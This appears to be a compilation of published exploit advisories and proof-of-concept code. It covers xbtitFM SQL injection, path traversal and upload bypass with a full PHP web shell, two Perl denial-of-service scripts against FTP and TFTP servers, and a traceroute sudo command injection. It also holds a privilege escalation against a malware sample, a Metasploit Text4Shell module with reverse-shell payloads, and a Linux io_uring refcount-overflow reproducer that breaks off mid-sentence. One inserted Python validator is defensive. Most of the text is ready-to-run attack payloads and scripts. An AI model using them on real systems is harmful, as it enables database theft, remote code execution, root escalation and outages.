<pre><code># Exploit Title: xbtitFM 4.1.18 Multiple Vulnerabilities
# Date: 22-01-2024
# Exploit Author: Who cares anyway
# Vendor Homepage: https://xbtitfm.eu
# Affected versions: 4.1.18 and prior
# CVE : Who cares anyway
# Description: The SQLi and the path traversal are unauthenticated, they don't require any user interaction to be exploited and are present in the default configuration of xbtitFM.
The insecure file upload requires the file_hosting feature (hack) being enabled. If not, it can be enabled by gaining access to an administrator account.
Looking at the state and the age of the codebase there are probably more, but who cares anyway...

[Unauthenticated SQL Injection - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H]

Some examples:
Get DB name:
/shoutedit.php?action=edit&msgid=1337 AND EXTRACTVALUE(0,CONCAT(0,0,(MID((IFNULL(CAST(DATABASE() AS NCHAR),0)),1,100))))

Get DB user:
/shoutedit.php?action=edit&msgid=1337 AND EXTRACTVALUE(0,CONCAT(0,0,(MID((IFNULL(CAST(CURRENT_USER() AS NCHAR),0)),1,100))))

Get password hash of any user (might need some modification to work on different instances):
/shoutedit.php?action=edit&msgid=1337 OR (1,1) = (SELECT COUNT(0),CONCAT((SELECT CONCAT_WS(0x3a,id,username,password,email,0x3a3a3a) FROM xbtit_users WHERE username='admin_username_or_whatever_you_like'),FLOOR(RAND(0)*2)) FROM (information_schema.tables) GROUP BY 2);

Now the fun part. Automate it with sqlmap to dump the database.
1) Get DB name
sqlmap -u "https://example.xyz/shoutedit.php?action=edit&msgid=1337" -p msgid --technique=E --answers="include=N" --batch --current-db
2) Get table names
sqlmap -u "https://example.xyz/shoutedit.php?action=edit&msgid=1337" -p msgid --technique=E --answers="include=N" --batch -D the_identified_database_name --tables
3) Dump users table (usually called xbtit_users)
sqlmap -u "https://example.xyz/shoutedit.php?action=edit&msgid=1337" -p msgid --technique=E --answers="include=N" --batch -D the_identified_database_name -T xbtit_users -C id,username,email,cip,dob,password,salt,secret --dump
4) Crack hashes (usually unsalted MD5, yey!)
hashcat -m 0 xbtitfm_exported_hashes.txt wordlist.txt
Pro tip: Use All-in-One-P (https://weakpass.com/all-in-one)

[Unauthenticated Path traversal - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N]

1) Intentionally search for a file that doesn't exist to get the web application path e.g. (/home/xbtitfm/public_html/)
https://example.xyz/nfo/nfogen.php?nfo=random_value_to_get_error_that_reveals_the_real_path

2) Read files that contain database credentials.
https://example.xyz/nfo/nfogen.php?nfo=../../../../../../../home/xbtitfm/public_html/include/settings.php
https://example.xyz/nfo/nfogen.php?nfo=../../../../../../../home/xbtitfm/public_html/include/update.php

Or any other system file you want.
https://example.xyz/nfo/nfogen.php?nfo=../../../../../../../etc/passwd

3) Now who needs the SQLi to dump the DB when you have this gem? Check if the following file is configured
https://example.xyz/nfo/nfogen.php?nfo=../../../../../../../home/xbtitfm/public_html/sxd/cfg.php
If so, go to https://example.xyz/sxd (CBT Sql backup utility aka Sypex-Dumper), login with the DB credentials you just found, now export the DB with one click. Nice and easy.

[Insecure file upload - Remote Code Execution (Authenticated)- CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H]

If that wasn't enough already and you want RCE, visit https://example.xyz/index.php?page=file_hosting
If the file hosting feature (hack) is enabled, then simply just upload a PHP shell with the following bypass.
Changing the Content-Type of the file to image/gif and the first bytes to GIF89a; are enough to bypass the filetype checks.
A silly countermeasure against PHP files is in place so make sure you change <?php to <?pHp to bypass it.

Content-Disposition: form-data; name="file"; filename="definately_not_a_shell.php"
Content-Type: image/gif

GIF89a;
<html>
<body>
<form method="GET" name="<?pHp echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>

<pre>
<?pHp

 if(isset($_GET['cmd']))
 {
 system($_GET['cmd']);
 }
?>

</pre>
</body>
</html>

The web shell will then be uploaded here:
https://example.xyz/file_hosting/definately_not_a_shell.php

If the file hosting feature is disabled, extract and crack the hash of an admin, then enable the feature from the administration panel and upload the shell.
</code></pre>
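As an added defensive illustration (not code from the xbtitFM project or from this advisory), the Python below models the filter the advisory describes (Content-Type must be image/gif, body must start with GIF89a, a case-sensitive `<?php` string check) beside a hardened validator that allow-lists types, matches magic bytes to the declared type, scans for PHP open tags in any letter case, and stores the file under a server-chosen name. The allow-list, function names and sample upload bodies are constructed for this example.

```python
import re
import secrets

# Allow-list for this hypothetical upload handler (an assumption, not xbtitFM's
# configuration): extension -> (required Content-Type, accepted magic prefixes)
ALLOWED_TYPES = {
    "gif": ("image/gif", (b"GIF87a", b"GIF89a")),
    "png": ("image/png", (b"\x89PNG\r\n\x1a\n",)),
    "jpg": ("image/jpeg", (b"\xff\xd8\xff",)),
}

# Any PHP open tag, in any letter case: <?php, <?PHP, <?pHp, and the <?= echo tag.
PHP_OPEN_TAG = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)


def naive_check(content_type: str, data: bytes) -> bool:
    """Model of the filter the advisory describes (not xbtitFM's actual code):
    the declared type must be image/gif, the body must start with GIF89a, and
    the body must not contain the exact lower-case string '<?php'."""
    return (content_type == "image/gif"
            and data.startswith(b"GIF89a")
            and b"<?php" not in data)


def hardened_check(filename: str, content_type: str, data: bytes):
    """Return (accepted, reason, stored_name).

    The client-supplied filename only contributes its extension, and only if
    that extension is on the allow-list; the name the file is stored under is
    generated by the server, so a '.php' upload can never land on disk as .php.
    """
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED_TYPES:
        return False, f"extension {ext!r} not in allow-list", None
    required_mime, magics = ALLOWED_TYPES[ext]
    if content_type != required_mime:
        return False, "Content-Type does not match extension", None
    if not data.startswith(magics):
        return False, "magic bytes do not match declared type", None
    # Content scanning is defence in depth only: image/PHP polyglots exist, so
    # the decisive control is that the upload directory never executes PHP.
    if PHP_OPEN_TAG.search(data):
        return False, "embedded PHP open tag (any case)", None
    return True, "ok", f"{secrets.token_hex(16)}.{ext}"


# Constructed sample bodies. The first has the shape of the advisory's bypass
# (GIF89a header, mixed-case tag) but carries a harmless echo instead of a shell.
POLYGLOT = b"GIF89a;\n<?pHp echo 'constructed marker'; ?>\n"
# A real 1x1 transparent GIF, assembled by hand for the test.
REAL_GIF = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
            b"!\xf9\x04\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00"
            b"\x00\x02\x02D\x01\x00;")


def compare(filename: str, content_type: str, data: bytes) -> dict:
    """Run both filters over one upload so the difference is visible."""
    accepted, reason, stored = hardened_check(filename, content_type, data)
    return {"naive": naive_check(content_type, data),
            "hardened": accepted, "reason": reason, "stored_as": stored}


if __name__ == "__main__":
    print(compare("definately_not_a_shell.php", "image/gif", POLYGLOT))
    print(compare("avatar.gif", "image/gif", POLYGLOT))
    print(compare("avatar.gif", "image/gif", REAL_GIF))
```

The control this function cannot provide is the one the advisory's last step depends on: the directory the files are served from (/file_hosting/ here) must not be handed to the PHP interpreter at all.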
<pre><code>#!/usr/bin/perl

use IO::Socket::INET;

# Exploit Title: Golden FTP Server 2.02b - Denial of Service (DoS)
# Discovery by: Fernando Mengali
# Discovery Date: 21 january 2024
# Vendor Homepage: N/A
# Download to demo: https://drive.google.com/file/d/1AK6x0xKwjVZxoNHbCOIJsIiRAWeMmP_0/view?usp=sharing
# Notification vendor: Not reported
# Tested Version: Golden FTP Server 2.02b - Denial of Service (DoS)
# Tested on: Windows XP Professional - Service Pack 2 and 3 - English
# Vulnerability Type: Denial of Service (DoS)

#1. Description

#This technique works fine against Windows XP Professional Service Pack 2 and 3 (English).
#For this exploit I have tried several strategies to increase reliability and performance:
#Jump to a static 'call esp'
#Backwards jump to code a known distance from the stack pointer.
#The FTP server does not correctly handle the amount of data or bytes sent to command RNTO.
#When authenticating to the FTP server with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

$sis = "$^O";

# $^O reports "MSWin32" on Windows, so compare against that value
if ($sis eq "MSWin32") {
    $cmd = "cls";
} else {
    $cmd = "clear";
}

system("$cmd");

intro();
main();

print "[+] Exploiting...\n";

print "[+] Connecting to $ip:$port\n";
my $s = IO::Socket::INET->new(PeerAddr => $ip, PeerPort => $port, Proto => 'tcp') or die "Could not connect to $ip:$port\n";

$s->send("USER anon\r\n");
my $response = <$s>;
print $response;
$s->send("PASS anon\r\n");
$response = <$s>;
print $response;
$s->send("SYST\r\n");
$response = <$s>;
print $response;
sleep(2);
$s->send("PASV " . "\x41"x6631 . "\r\n");
sleep(3);
$response = <$s>;
print $response;
$response = <$s>;
print $response;
print ">>> Sending second payload\n";
$s->send("PASV " . "\x90"x123 . "\x90"x2877 . "\r\n");
$response = <$s>;
print $response;
sleep(2);


print "[+] Done - Exploited success!!!!!\n\n";

sub intro {
    print q {

 ,--,
 _ ___/ /\|
 ,;'( )__, ) ~
 // // '--;
 ' \ | ^
 ^ ^

 [+] Golden FTP Server 2.02b - Denial of Service (DoS)

 [*] Coded by Fernando Mengali

 [@] e-mail: fernando.mengalli@gmail.com

 }
}

sub main {

    # package variables so the top-level code can read them after main() returns
    our ($ip, $port) = @ARGV;

    unless (defined($ip) && defined($port)) {

        print " \nUsage: $0 <ip> <port> \n";
        exit(-1);

    }
}
</code></pre>
<pre><code>Description:
In Traceroute 2.0.12 through to 2.1.2 (fixed in 2.1.3), the wrapper scripts mishandle shell metacharacters, which can lead to privilege escalation if the wrapper scripts are executed via sudo. The affected wrapper scripts are: tcptraceroute, tracepath, traceproto and traceroute-nanog.

Additional information:
CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N - 7.3 (High)
A local privilege escalation was identified in wrapper scripts provided by the Traceroute for Linux package (https://sourceforge.net/projects/traceroute/). The wrapper scripts do not properly sanitise the user's input, which is taken as parameters and passed into the traceroute command. The user can inject a semicolon (;) into any of the parameters of the affected wrappers, and the wrapper will treat the text following the semicolon as a new operating system command.

The scripts require the user to have raw socket access in order to function as intended. It is common for low-privilege users to be granted sudo root permissions to run the wrapper scripts as opposed to setting "cap_net_raw" capabilities to the binary, or through the use of "icmp dgram" sockets. Thus any user on the local machine can escalate their privileges to root, with the only Attack Requirements (AT in CVSS 4) being that they have sudo root permissions to execute the vulnerable wrapper scripts.

The vulnerable wrapper scripts have been provided since version 2.0.12. Distributions such as Debian 12, Fedora 38, Centos 8 and Amazon Linux 2 include these wrapper scripts with default installations.

Exploitation:
sudo tcptraceroute localhost ";bash"
</code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024
Original source: https://malvuln.com/advisory/15bda00b57e2ed729a45f7cfa62165da.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: TrojanSpy Win32 Nivdort
Vulnerability: Insecure Permissions - EoP (SYSTEM)
Family: Nivdort
Type: PE32
MD5: 15bda00b57e2ed729a45f7cfa62165da
Vuln ID: MVID-2024-0668
Dropped files: dqrpgvnkh, egjrdhynfm, nhefhloix, rvoyf6ljtqg4zejno.exe
Disclosure: 01/20/2024

Description:
The malware creates a service which runs as SYSTEM and grants change (C) permissions to the authenticated user group on its installation directory. Standard low integrity users can still rename the service executable while it is running, replace the PE file with their own and restart the infected system to start the service.

C:\>cacls C:\pewcvmnvyr\jwgaklb.exe
C:\pewcvmnvyr\jwgaklb.exe BUILTIN\Administrators:(ID)F
                          NT AUTHORITY\SYSTEM:(ID)F
                          BUILTIN\Users:(ID)R
                          NT AUTHORITY\Authenticated Users:(ID)C


C:\>sc qc "Group Key KtmRm Coordinator Registry TPM Bus"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Group Key KtmRm Coordinator Registry TPM Bus
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2    AUTO_START
        ERROR_CONTROL      : 0    IGNORE
        BINARY_PATH_NAME   : C:\pewcvmnvyr\jwgaklb.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Group Key KtmRm Coordinator Registry TPM Bus
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem


Exploit/PoC:
Open a cmd prompt as standard user:

1) unhide the service binary
C:\Users\norgt>attrib -s -h \pewcvmnvyr\jwgaklb.exe

2) rename the service binary
C:\Users\norgt>ren \pewcvmnvyr\jwgaklb.exe PWNED

3) optional replace with your own binary and escalate to SYSTEM

C:\Users\norgt>dir \pewcvmnvyr\
 Directory of C:\pewcvmnvyr
 ..
01/14/2024  02:05 AM                 0 dqrpgvnkh
01/14/2024  02:05 AM                 6 egjrdhynfm
01/14/2024  02:09 AM                 4 nhefhloix
01/14/2024  02:05 AM           332,800 PWNED   <================= DONE
01/14/2024  02:05 AM           332,800 rvoyf9njtqg4zejno.exe


Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
</code></pre>
<pre><code>#!/usr/bin/perl


use IO::Socket::INET;

# Exploit Title: ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Denial of Service (DoS)
# Discovery by: Fernando Mengali
# Discovery Date: 20 january 2024
# Vendor Homepage: N/A
# Download to demo: https://drive.google.com/file/d/1MLqBkCyu0dA-cNgYxCAO8xbsVcof060Z/view?usp=sharing
# Notification vendor: Not reported
# Tested Version: ProSysInfo TFTP Server TFTPDWIN 0.4.2
# Tested on: Windows XP Professional - Service Pack 2 and 3 - English
# Vulnerability Type: Denial of Service (DoS)
# Video: https://www.youtube.com/watch?v=BuONti1AWoU

#1. Description

#This technique works fine against Windows XP Professional Service Pack 2 and 3 (English).
#For this exploit I have tried several strategies to increase reliability and performance:
#Jump to a static 'call esp'
#Backwards jump to code a known distance from the stack pointer.
#The TFTP server does not correctly handle the amount of data or bytes sent.
#When authenticating to the TFTP server with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

$sis = "$^O";

# $^O reports "MSWin32" on Windows, so compare against that value
if ($sis eq "MSWin32") {
    $cmd = "cls";
} else {
    $cmd = "clear";
}

system("$cmd");

intro();
main();

print "[+] Exploiting...\n";

my $payload = "\x41" x 520;

# UDP socket to the TFTP service; $ip and $port are set by main() from @ARGV
my $socket = IO::Socket::INET->new(
    PeerAddr => $ip,
    PeerPort => $port,
    Proto    => 'udp'
) or die "Could not connect to the TFTP server: $!\n";

# send the oversized datagram
print $socket $payload;

close($socket);

print "[+] Done - Exploited success!!!!!\n\n";

sub intro {
    print "######################################################################\n";
    print "# #\n";
    print "# ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Denial of Service #\n";
    print "# #\n";
    print "# Coded by Fernando Mengali #\n";
    print "# #\n";
    print "# e-mail: fernando.mengalli\@gmail.com #\n";
    print "# #\n";
    print "######################################################################\n";
}

sub main {

    # package variables so the top-level code can read them after main() returns
    our ($ip, $port) = @ARGV;

    unless (defined($ip) && defined($port)) {

        print " \nUsage: $0 <ip> <port> \n";
        exit(-1);

    }
}

#3. Solution/ How to fix:

# This version of the product is deprecated
</code></pre>
<pre><code>##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  include Msf::Exploit::Remote::Java::HTTP::ClassLoader

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Apache Commons Text RCE',
        'Description' => %q{
          This exploit takes advantage of the StringSubstitutor interpolator class,
          which is included in the Commons Text library. A default interpolator
          allows for string lookups that can lead to Remote Code Execution. This
          is due to a logic flaw that makes the “script”, “dns” and “url” lookup
          keys interpolated by default, as opposed to what it should be, according
          to the documentation of the StringLookupFactory class. Those keys allow
          an attacker to execute arbitrary code via lookups primarily using the
          "script" key.

          In order to exploit the vulnerabilities, the following requirements must
          be met:

          Run a version of Apache Commons Text from version 1.5 to 1.9
          Use the StringSubstitutor interpolator
          Target should run JDK < 15
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Alvaro Muñoz', # Original research
          'Karthik UJ', # PoC
          'Gaurav Jain', # Metasploit module
        ],
        'References' => [
          ['CVE', '2022-42889'],
          ['URL', 'https://sysdig.com/blog/cve-2022-42889-text4shell/'],
          ['URL', 'https://github.com/karthikuj/cve-2022-42889-text4shell-docker']
        ],
        'Platform' => ['win', 'linux', 'unix', 'java'],
        'Targets' => [
          [
            'Java (in-memory)',
            {
              'Type' => :java,
              'Platform' => 'java',
              'Arch' => ARCH_JAVA,
              'DefaultOptions' => { 'Payload' => 'java/meterpreter/reverse_tcp' }
            },
          ],
          [
            'Windows EXE Dropper',
            {
              'Platform' => 'win',
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :windows_dropper,
              'DefaultOptions' => { 'Payload' => 'windows/x64/meterpreter/reverse_tcp' }
            }
          ],
          [
            'Windows Command',
            {
              'Platform' => 'win',
              'Arch' => ARCH_CMD,
              'Type' => :windows_cmd,
              'DefaultOptions' => { 'Payload' => 'cmd/windows/powershell/meterpreter/reverse_tcp' }
            }
          ],
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd,
              'DefaultOptions' => { 'Payload' => 'cmd/unix/reverse_jjs' }
            }
          ],
          [
            'Linux Dropper',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :linux_dropper,
              'DefaultOptions' => { 'Payload' => 'linux/x86/meterpreter/reverse_tcp' }
            }
          ]
        ],
        'Privileged' => false,
        'DisclosureDate' => '2022-10-13',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
        }
      )
    )
    register_options([
      OptString.new('TARGETURI', [ true, 'The target URI', '/']),
      OptString.new('PARAM', [ true, 'The vulnerable parameter']),
      OptEnum.new('METHOD', [ true, 'The HTTP method to use', 'GET', ['GET', 'POST']])
    ])
  end

  def check
    vprint_status("Checking if #{peer} can be exploited.")
    res = send_exp
    return CheckCode::Unknown('No response received from target.') unless res

    # blind command injection using sleep command
    sleep_time = rand(4..8)
    vprint_status("Performing command injection test issuing a sleep command of #{sleep_time} seconds.")
    _res, elapsed_time = Rex::Stopwatch.elapsed_time do
      send_exp("java.lang.Thread.sleep(#{sleep_time * 1000})")
    end
    vprint_status("Elapsed time: #{elapsed_time.round(2)} seconds.")
    return CheckCode::Safe('Command injection test failed.') unless elapsed_time >= sleep_time

    CheckCode::Vulnerable('Successfully tested command injection.')
  end

  def exploit
    case target['Type']
    when :java
      # Start the HTTP server to serve the payload
      start_service
      # Trigger a loadClass request via java.net.URLClassLoader
      trigger_urlclassloader
      # Handle the payload
      handler
    when :windows_cmd, :unix_cmd
      execute_command(payload.encoded)
    when :windows_dropper, :linux_dropper
      execute_cmdstager
    end
  end

  def trigger_urlclassloader
    url = get_uri

    vars = Rex::RandomIdentifier::Generator.new

    exp = "var #{vars[:str_arr]} = Java.type('java.lang.String[]');"
    exp << "var #{vars[:obj]} = new java.net.URLClassLoader([new java.net.URL(new java.lang.String(java.util.Base64.getDecoder().decode('#{Rex::Text.encode_base64(url)}')))]).loadClass('metasploit.Payload');"
    exp << "#{vars[:obj]}.getMethod('main', java.lang.Class.forName('[Ljava.lang.String;')).invoke(null, [new #{vars[:str_arr]}(1)]);"

    res = send_exp(exp)

    fail_with(Failure::Unreachable, 'No response received from the target') unless res
    fail_with(Failure::Unknown, 'An unknown error occurred') unless res.code == 200
  end

  def execute_command(cmd, _opts = {})
    vars = Rex::RandomIdentifier::Generator.new

    exp = "var #{vars[:arr]} = [#{win_target? ? '"cmd.exe", "/c"' : '"/bin/sh", "-c"'}, new java.lang.String(java.util.Base64.getDecoder().decode(\"#{Rex::Text.encode_base64(cmd)}\"))];"
    exp << "java.lang.Runtime.getRuntime().exec(#{vars[:arr]});"

    res = send_exp(exp)

    fail_with(Failure::Unreachable, 'No response received from the target') unless res
    fail_with(Failure::Unknown, 'An unknown error occurred') unless res.code == 200
  end

  def send_exp(exp = '')
    vars = datastore['METHOD'] == 'GET' ? 'vars_get' : 'vars_post'
    send_request_cgi(
      'method' => datastore['METHOD'],
      'uri' => normalize_uri(target_uri.path),

      vars => {
        datastore['PARAM'] => "${script:javascript:#{exp}}"
      }
    )
  end

  def win_target?
    target['Platform'] == 'win'
  end

  def on_request_uri(cli, request)
    case target['Type']
    when :java
      # Call method to handle java payload staging
      super(cli, request)
    else
      # Handle win/unix cmd staging
      client = cli.peerhost
      print_status("Client #{client} requested #{request.uri}")
      print_status("Sending payload to #{client}")
      send_response(cli, exe)
    end
  end
end
</code></pre>
<pre><code>Linux >=5.6: cred refcount overflow at ~39 GiB memory usage via io_uring

(see also my related prior bug reports about overflowing refcounts with lots
of RAM usage:
https://crbug.com/project-zero/809: BPF program refcount, with ~32GiB RAM
https://crbug.com/project-zero/1752: page->refcount via FUSE with ~140GiB RAM)


Since commit 071698e13ac6 ("io_uring: allow registering credentials"), landed
in 5.6, it has been possible to grab references to `struct cred` very
efficiently - by repeatedly calling the syscall
`io_uring_register(fd, IORING_REGISTER_PERSONALITY, NULL, 0)`, it is possible
to register up to 0xffff refcounted pointers to `struct cred` in an xarray
(or in older kernel versions, in an IDR). These pointers can all be pointing
to the same `struct cred`.
By using a bunch of io_uring instances, that makes it possible to create a
lot of refcounted references to `struct cred` at a very efficient and low
amortized memory cost of less than 10 bytes per reference.

`struct cred` is refcounted using the member `atomic_t usage`, which is a
plain signed 32-bit atomic counter with no overflow checking.
I believe there is some history here where Elena Reshetova and Kees Cook have
been trying to turn it into a `refcount_t`, which would also fix this kind of
issue by marking the refcount as "saturated" when it reaches 2^31 and then
never freeing the object. Most recently there was this thread, where Kees
tried to get that change in; there was some discussion, but I don't think
anything has landed so far:
<https://lore.kernel.org/all/20230818041740.gonna.513-kees@kernel.org/>

So by using ~39 GiB of physical memory, it is possible to store 2^32
references to `struct cred` and overflow the reference counter. That's not
exactly a small amount of RAM, but I guess a lot of servers probably have that
much RAM? At least cloud providers like AWS sell machines with much more RAM
than that.

I am including as recipients both akpm (who is the maintainer for
kernel/cred.c and was involved in the linked discussion) and the io_uring
maintainers (though io_uring, in my opinion, isn't really where the core issue
here lies, but it happened to make it possible to hit this overflow using a
fairly small amount of physical memory).


Reproducer (compile with -pthread; requires ~39GiB of physical RAM, I tested it
in a VM so that the host machine could swap a bit):
============
#define _GNU_SOURCE
#include <pthread.h>
#include <unistd.h>
#include <err.h>
#include <fcntl.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <ctype.h>
#include <signal.h>
#include <sys/syscall.h>
#include <sys/wait.h>
#include <sys/prctl.h>
#include <sys/mman.h>
#include <sys/resource.h>
#include <sys/eventfd.h>
#include <linux/io_uring.h>

#define SYSCHK(x) ({ \
  typeof(x) __res = (x); \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res; \
})

// power of 2
#define PARALLELISM 4

static int efd;

static void *thread_fn(void *dummy) {
  for (long refcount = 0; refcount < (1UL<<32)/PARALLELISM;) {
    struct io_uring_params params = {
      .flags = IORING_SETUP_NO_SQARRAY
    };
    int uring_fd = SYSCHK(syscall(__NR_io_uring_setup, /*entries=*/40, &params));
    printf("uring_fd = 0x%x\n", (unsigned int)uring_fd);
    for (int i=0; i<0xffff; i++, refcount++)
      SYSCHK(syscall(__NR_io_uring_register, uring_fd, IORING_REGISTER_PERSONALITY, NULL, 0));
  }
  printf("one thread ready\n");
  eventfd_write(efd, 1);
  while (1) pause();
}

int main(void) {
  setbuf(stdout, NULL);
  sync();

  struct rlimit rlim;
  SYSCHK(getrlimit(RLIMIT_NOFILE, &rlim));
  if (rlim.rlim_max < 65550)
    printf("WARNING: RLIMIT_NOFILE maximum is probably too low\n");
  rlim.rlim_cur = rlim.rlim_max;
  SYSCHK(setrlimit(RLIMIT_NOFILE, &rlim));

  efd = SYSCHK(eventfd(0, 0));

  pthread_t threads[PARALLELISM];
  for (int i = 0; i < PARALLELISM; i++) {
    if (pthread_create(threads+i, NULL, thread_fn, NULL))
      errx(1, "pthread_create");
  }

  for (int i=0; i<4;) {
    eventfd_t val;
    SYSCHK(eventfd_read(efd, &val));
    i += val;
  }
  printf("refs should have wrapped. press ctrl+c for uaf on cleanup.\n");
  while (1)
    pause();
}
============

The reproducer takes a while to run; when it's done and the cred refcount has
been wrapped, you can press ctrl+c to make the process exit, which will
repeatedly decrement the cred refcount until the cred refcount reaches zero
(when there are actually 2^32 references remaining).
At that point, it'll hit the `BUG_ON(cred == current->cred)` check in
`__put_cred()`, since the reproducer doesn't go out of its way to avoid this
check:

============
kernel BUG at kernel/cred.c:150!
invalid opcode: 0000 [#1] PREEMPT SMP
CPU: 2 PID: 580 Comm: uring-credref Not tainted 6.7.0-rc3 #362
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014
RIP: 0010:__put_cred+0x55/0x60
Code: 87 a0 00 00 00 85 c0 74 0c 48 81 c7 a0 00 00 00 e9 b0 fe ff ff 48 81 c7 a0 00 00 00 48 c7 c6 40 39 0d b0 e9 9d 53 07 00 0f 0b <0f> 0b 0f 0b 0f 1f 80 00 00 00 00 90 90 90 90 90 90 90 90 90 90 90
RSP: 0018:ffffb2e382b5bcf0 EFLAGS: 00010246
RAX: ffff8c4e21c6c080 RBX: ffff8c52fce02000 RCX: ffffb2e382b5bc94
RDX: 0000000000000001 RSI: ffff8c52fce025c0 RDI: ffff8c4e1f2c2480
RBP: ffff8c52fce025a8 R08: ffffb2e382b5bc98 R09: 0000000000000007
R10: 0000000000000001 R11: 0000000000000001 R12: ffff8c52fce02040
R13: ffff8c4e072fc520 R14: ffff8c576139c9c0 R15: ffff8c4e21c6c938
FS:  0000000000000000(0000) GS:ffff8c598dd00000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 000055a8bdfd1d70 CR3: 0000000411e47001 CR4: 0000000000770ef0
PKRU: 55555554
Call Trace:
 <TASK>
 [...]
 io_ring_ctx_wait_and_kill+0xa8/0x180
 io_uring_release+0x20/0x30
 __fput+0x92/0x2c0
 task_work_run+0x5a/0x90
 do_exit+0x36c/0xbc0
 do_group_exit+0x37/0xa0
 get_signal+0xbcf/0xbd0
 arch_do_signal_or_restart+0x3e/0x270
 exit_to_user_mode_prepare+0xba/0x110
 syscall_exit_to_user_mode+0x21/0x50
 do_syscall_64+0x52/0xf0
 entry_SYSCALL_64_after_hwframe+0x6e/0x76
RIP: 0033:0x7ff41d547d92
Code: Unable to access opcode bytes at 0x7ff41d547d68.
RSP: 002b:00007ff41d370e30 EFLAGS: 00000293 ORIG_RAX: 0000000000000022
RAX: fffffffffffffdfe RBX: 000000004000bfff RCX: 00007ff41d547d92
RDX: 0000000000000008 RSI: 00007ff41d370e38 RDI: 0000000000000000
RBP: 000000000000ffc1 R08: 0000000000000000 R09: 0000008000000040
R10: 0000000000000000 R11: 0000000000000293 R12: 000000004000bfff
R13: 00007ff41d370e50 R14: 00007ff41d370e50 R15: 0000000000000000
 </TASK>
Modules linked in:
---[ end trace 0000000000000000 ]---
RIP: 0010:__put_cred+0x55/0x60
Code: 87 a0 00 00 00 85 c0 74 0c 48 81 c7 a0 00 00 00 e9 b0 fe ff ff 48 81 c7 a0 00 00 00 48 c7 c6 40 39 0d b0 e9 9d 53 07 00 0f 0b <0f> 0b 0f 0b 0f 1f 80 00 00 00 00 90 90 90 90 90 90 90 90 90 90 90
RSP: 0018:ffffb2e382b5bcf0 EFLAGS: 00010246
RAX: ffff8c4e21c6c080 RBX: ffff8c52fce02000 RCX: ffffb2e382b5bc94
RDX: 0000000000000001 RSI: ffff8c52fce025c0 RDI: ffff8c4e1f2c2480
RBP: ffff8c52fce025a8 R08: ffffb2e382b5bc98 R09: 0000000000000007
R10: 0000000000000001 R11: 0000000000000001 R12: ffff8c52fce02040
R13: ffff8c4e072fc520 R14: ffff8c576139c9c0 R15: ffff8c4e21c6c938
FS:  0000000000000000(0000) GS:ffff8c598dd00000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 000055a8bdfd1d70 CR3: 0000000411e47001 CR4: 0000000000770ef0
PKRU: 55555554
Fixing recursive fault but reboot is needed!
============

A use-after-free of `struct cred` should be exploitable; one method would be
to try to get the freed object allocated again as the `struct cred` of a
root-privileged process, another method would be to try to reallocate the
object with a buffer containing attacker-controlled data somehow (and then
fake a full capability set in init_user_ns with UIDs set to zero).


While one tempting easy fix here would be to close off avenues for getting
lots of references with little RAM (like somehow making io_uring reuse IDs
with a local usage counter when userspace tries to insert the same
`struct cred` into the xarray multiple times), I think that this example shows
how fragile that method is. It requires knowing about all the various
